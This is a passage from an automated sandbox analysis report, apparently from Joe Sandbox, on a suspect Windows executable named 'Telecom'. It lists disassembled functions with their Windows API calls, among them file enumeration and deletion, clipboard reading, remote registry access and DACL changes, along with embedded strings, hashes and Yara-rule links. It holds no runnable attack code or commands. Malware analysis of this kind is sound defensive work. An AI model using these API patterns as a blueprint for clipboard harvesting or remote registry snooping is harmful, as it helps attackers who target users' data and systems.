CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004ADAC7,?,?), ref: 004ADB5D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: a7d933d24e70b698ef212c714abbc397f12ef355793d2809ac01d2e84c9b78bc
Instruction ID: eff2c8400103c729e34f15144cd3fb5c8f9f54254927ff3538c33c6245335c1a
Opcode Fuzzy Hash: a7d933d24e70b698ef212c714abbc397f12ef355793d2809ac01d2e84c9b78bc
Instruction Fuzzy Hash: EED0A7305D0208BBEF108B90CC03F99B7ACE701B45F1041A4B101EA0D0C7B5A5089724

Uniqueness

Uniqueness Score: -1.00%

Function 0048071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00480A84,?,?,00000000,?,00480A84,00000000,0000000C), ref: 00480737

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fb653239dc6a668f12108013a7471913abf4f57c4f07d869638f8517b4aa336a
Instruction ID: 65b3cfa1ee1c627c04c02a84424bea5baa760d56985675bc917f4859e362a8f8
Opcode Fuzzy Hash: fb653239dc6a668f12108013a7471913abf4f57c4f07d869638f8517b4aa336a
Instruction Fuzzy Hash: A5D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014010BE1856020C732E821AB94

Uniqueness

Uniqueness Score: -1.00%

Function 004AEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cc45d2e2dac664cc91fc5178aa854c676236f8b8f0d21694cd4300afff30db05
Instruction ID: 183cb912dff398070ce466fd02f75f8471547fe350369de24a240795e4505fef
Opcode Fuzzy Hash: cc45d2e2dac664cc91fc5178aa854c676236f8b8f0d21694cd4300afff30db05
Instruction Fuzzy Hash: F7B0922440160005AD280A7A5A099AB330078E33A57DC1BC2E479852E1C33D880FA958

Uniqueness

Uniqueness Score: -1.00%

Function 004B7E8F Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00446FA2: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 00446FD0

GetLastError.KERNEL32(00000002,00000000), ref: 004B8123

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 18d80312da9ef2a83a60a1fb1a1b04dafbf76d4e8961d089bec00496c2593821
Instruction ID: 3608b96e705c8aa580e2ac9da1ad2a0a69d98bb01ba80bf3ed218b42493ce6d2
Opcode Fuzzy Hash: 18d80312da9ef2a83a60a1fb1a1b04dafbf76d4e8961d089bec00496c2593821
Instruction Fuzzy Hash: D88190306043019FD714EF25C491AAEB7E4BF85354F05455EF8865B392CB38ED49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004B664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004ADC54: FindFirstFileW.KERNEL32(?,?), ref: 004ADCCB
Part of subcall function 004ADC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 004ADD1B
Part of subcall function 004ADC54: FindNextFileW.KERNEL32(00000000,00000010), ref: 004ADD2C
Part of subcall function 004ADC54: FindClose.KERNEL32(00000000), ref: 004ADD43

GetLastError.KERNEL32 ref: 004B666E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 3033e67046fd744a2977efe42b8c9b5298ce59609e43cb2a09e40a44eac570c4
Instruction ID: 87f8090c21ed03e23411b42260dad417972b76eefe845d506c4d95d9a82f1457
Opcode Fuzzy Hash: 3033e67046fd744a2977efe42b8c9b5298ce59609e43cb2a09e40a44eac570c4
Instruction Fuzzy Hash: 5FF08C366002008FDB14EF5AD845B6EB7E5AF98324F05841EF90A8B352CB78BC01CB98

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004D5311 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000408,00000000,00000000), ref: 004D5391
SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004D53A6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004D53C5
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 004D53E9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004D53FA
SendMessageW.USER32(?,00000149,00000000,00000000), ref: 004D5419
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004D544C
SendMessageW.USER32(?,0000133C,00000000,?), ref: 004D5472
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004D54AD
SendMessageW.USER32(?,0000113E,00000000,00000004), ref: 004D54F4
SendMessageW.USER32(?,0000113E,00000000,00000004), ref: 004D551C
IsMenu.USER32(?), ref: 004D5535
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004D5590
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004D55BE
GetWindowLongW.USER32(?,000000F0), ref: 004D5632
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 004D5681
SendMessageW.USER32(?,00001001,00000000,?), ref: 004D5720
wsprintfW.USER32 ref: 004D574C
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004D5767
GetWindowTextW.USER32(?,00000000,00000001), ref: 004D578F
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004D57B1
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004D57D1
GetWindowTextW.USER32(?,00000000,00000001), ref: 004D57F8

Strings

%d/%02d/%02d, xrefs: 004D5746
0, xrefs: 004D5560

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$0
API String ID: 4054740463-4206205729
Opcode ID: ac665cd7f244ae3f2c765765ab1415cc96b49a2d2403696294824ae5d7386bb1
Instruction ID: 1ff24cdc0027663cb6b672be1f5adefedab4d93c5727887ababe598fbee1044e
Opcode Fuzzy Hash: ac665cd7f244ae3f2c765765ab1415cc96b49a2d2403696294824ae5d7386bb1
Instruction Fuzzy Hash: 8712FF71900614ABEB259F28DC99FAF7BE8EF85310F10426BF515EA3D0DB788941CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004A14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004A1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004A1A60
Part of subcall function 004A1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,004A14E7,?,?,?), ref: 004A1A6C
Part of subcall function 004A1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004A14E7,?,?,?), ref: 004A1A7B
Part of subcall function 004A1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004A14E7,?,?,?), ref: 004A1A82
Part of subcall function 004A1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004A1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004A1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004A154C
GetLengthSid.ADVAPI32(?), ref: 004A1563
GetAce.ADVAPI32(?,00000000,?), ref: 004A159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004A15B9
GetLengthSid.ADVAPI32(?), ref: 004A15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004A15D8
HeapAlloc.KERNEL32(00000000), ref: 004A15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004A1600
CopySid.ADVAPI32(00000000), ref: 004A1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004A1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004A1658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004A166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004A1691
HeapFree.KERNEL32(00000000), ref: 004A1698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004A16A1
HeapFree.KERNEL32(00000000), ref: 004A16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004A16B1
HeapFree.KERNEL32(00000000), ref: 004A16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 004A16C4
HeapFree.KERNEL32(00000000), ref: 004A16CB

Part of subcall function 004A1ADF: GetProcessHeap.KERNEL32(00000008,004A14FD,?,00000000,?,004A14FD,?), ref: 004A1AED
Part of subcall function 004A1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,004A14FD,?), ref: 004A1AF4
Part of subcall function 004A1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004A14FD,?), ref: 004A1B03

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 22dbad9b20eb2635f3ae39f97894441f2b3f1d96c543121f5bfa0030aab864aa
Instruction ID: d8af7ed90ed84adb91895f02a456a9d6f3cec337a39ea97b038c00527838fe2b
Opcode Fuzzy Hash: 22dbad9b20eb2635f3ae39f97894441f2b3f1d96c543121f5bfa0030aab864aa
Instruction Fuzzy Hash: 07716BB2901209BBDF109FA5DC48FAFBBB8FF55344F084526E915E62A0D7349905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004BF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(004DDCD0), ref: 004BF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 004BF594
GetClipboardData.USER32(0000000D), ref: 004BF5A0
CloseClipboard.USER32 ref: 004BF5AC
GlobalLock.KERNEL32(00000000), ref: 004BF5E4
CloseClipboard.USER32 ref: 004BF5EE
GlobalUnlock.KERNEL32(00000000,00000000), ref: 004BF619
IsClipboardFormatAvailable.USER32(00000001), ref: 004BF626
GetClipboardData.USER32(00000001), ref: 004BF62E
GlobalLock.KERNEL32(00000000), ref: 004BF63F
GlobalUnlock.KERNEL32(00000000,?), ref: 004BF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 004BF695
GetClipboardData.USER32(0000000F), ref: 004BF6A1
GlobalLock.KERNEL32(00000000), ref: 004BF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004BF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004BF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004BF72F
GlobalUnlock.KERNEL32(00000000,?,?), ref: 004BF750
CountClipboardFormats.USER32 ref: 004BF771
CloseClipboard.USER32 ref: 004BF7B6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: b5d16dc7bf9544340d58bd2cf42bdf0acb89d55828a5e463148106fe3f74a9b4
Instruction ID: e79f8ee9d8138923bfc9cda06a8ea7be5a28ae7dde6bc623c55a4202e6ad0336
Opcode Fuzzy Hash: b5d16dc7bf9544340d58bd2cf42bdf0acb89d55828a5e463148106fe3f74a9b4
Instruction Fuzzy Hash: C761C535105201AFD310EF20DC85F6A77A4EF44708F14456FF84A872A2DB35E94ACBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004B73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004B7403
FindClose.KERNEL32(00000000), ref: 004B7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004B7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004B74BA

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 004B74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 004B7524

Strings

%02d, xrefs: 004B7645, 004B764F, 004B769F, 004B76EF, 004B773F, 004B778F
%4d%02d%02d%02d%02d%02d, xrefs: 004B75AF
%03d, xrefs: 004B77E7
%4d%02d%02d%02d%02d%02d%03d, xrefs: 004B7577
%4d, xrefs: 004B75F6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 30ba42280eed0e14f78c1e5a2627dfc2ee20f92e090441b35b4d4a190d81963b
Instruction ID: 9f267337aa9c08e68988a2887853dd0484f794704e06196e5a953af54c626048
Opcode Fuzzy Hash: 30ba42280eed0e14f78c1e5a2627dfc2ee20f92e090441b35b4d4a190d81963b
Instruction Fuzzy Hash: 60D153B1508344AFD310EB65C881EAFB7ECEF98708F44091EF585D6292EB78D948C766

Uniqueness

Uniqueness Score: -1.00%

Function 004BA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004BA0A8
GetFileAttributesW.KERNEL32(?), ref: 004BA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 004BA100
FindNextFileW.KERNEL32(00000000,?), ref: 004BA118
FindClose.KERNEL32(00000000), ref: 004BA123
FindFirstFileW.KERNEL32(*.*,?), ref: 004BA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 004BA18F
SetCurrentDirectoryW.KERNEL32(00507B94), ref: 004BA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 004BA1B7
FindClose.KERNEL32(00000000), ref: 004BA1C4
FindClose.KERNEL32(00000000), ref: 004BA1D4

Strings

*.*, xrefs: 004BA13A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: e532070ef2b88f5a924d48b846f3f279f56e9f8cde4c639d41430b3386ed3a6f
Instruction ID: b1dfc3ae103c6b3baf20a17786e807cb1f785a5caf775c139ee35680b04b2e29
Opcode Fuzzy Hash: e532070ef2b88f5a924d48b846f3f279f56e9f8cde4c639d41430b3386ed3a6f
Instruction Fuzzy Hash: 6D31C631A0121D7BDB14AFB9DC49ADF77ACAF05320F1001A7E815D2190EB78DE558A7D

Uniqueness

Uniqueness Score: -1.00%

Function 004B4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004B4785
_wcslen.LIBCMT ref: 004B47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 004B47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004B4803
RemoveDirectoryW.KERNEL32(?), ref: 004B4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004B489A
CloseHandle.KERNEL32(00000000), ref: 004B48A5
CloseHandle.KERNEL32(00000000), ref: 004B48B0

Strings

\??\%s, xrefs: 004B47A0
:, xrefs: 004B47C7
\, xrefs: 004B47BC

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 7072c4c922cdb865804184a16946db2eb5463625f175187f0912346dfd4f8928
Instruction ID: c38d671e073255b4bcdbe1e9938226597d2adfc1e0e78464e038371b1709316a
Opcode Fuzzy Hash: 7072c4c922cdb865804184a16946db2eb5463625f175187f0912346dfd4f8928
Instruction Fuzzy Hash: D9318E75900249AADB219BA0DC49FEB37BCEF89704F1040B7F50992161EB7896548B29

Uniqueness

Uniqueness Score: -1.00%

Function 0045CD7A Relevance: 17.7, Strings: 10, Instructions: 5155COMMON

Download Yara Rule

Strings

\b(?=\w), xrefs: 0049BF91
[:>:]], xrefs: 0045D306
,^P, xrefs: 00499F5D
^P, xrefs: 00499F38
Q\E, xrefs: 0049BFDC
\b(?<=\w), xrefs: 0049BF98
}, xrefs: 0049BAB6
DEFINE, xrefs: 0049A5C2
", xrefs: 0049B561
[:<:]], xrefs: 0045D2F0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: "$,^P$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$}$^P
API String ID: 0-3532964994
Opcode ID: 2d55cd2c19d795fc2a53c98f562407203c6876ea795d8f9c9f6458d82c3450c4
Instruction ID: ff3acc12506ddb2707b14b96e017244c40000bac8874303868b9a875a4f5b0b2
Opcode Fuzzy Hash: 2d55cd2c19d795fc2a53c98f562407203c6876ea795d8f9c9f6458d82c3450c4
Instruction Fuzzy Hash: E493A235E002159FCF24CF58D9916AEBBB1FF48310F24816BD945AB381E7789D82CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004BA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004BA203
FindNextFileW.KERNEL32(00000000,?), ref: 004BA25E
FindClose.KERNEL32(00000000), ref: 004BA269
FindFirstFileW.KERNEL32(*.*,?), ref: 004BA285
SetCurrentDirectoryW.KERNEL32(?), ref: 004BA2D5
SetCurrentDirectoryW.KERNEL32(00507B94), ref: 004BA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 004BA2FD
FindClose.KERNEL32(00000000), ref: 004BA30A
FindClose.KERNEL32(00000000), ref: 004BA31A

Part of subcall function 004AE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004AE3B4

Strings

*.*, xrefs: 004BA280

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 04364cf57a4030a18b16f7c36ff361c528dc652992a1a7b4feeae67b1dd95ae8
Instruction ID: de3cfda81398e72048979bfbed274d11218dbd1d3ac463cc1207ff1866deb715
Opcode Fuzzy Hash: 04364cf57a4030a18b16f7c36ff361c528dc652992a1a7b4feeae67b1dd95ae8
Instruction Fuzzy Hash: CF31143190120D6ACF24AFB5DC09ADF77ACAF45324F1001A7E810E3290EB39DE95CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 004CC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 004CCA09
RegCloseKey.ADVAPI32(00000000), ref: 004CCA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004CCA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004CCB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 004CCBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 004CCC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 004CCC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 004CCD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 004CCDE2
RegCloseKey.ADVAPI32(00000000), ref: 004CCDEF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
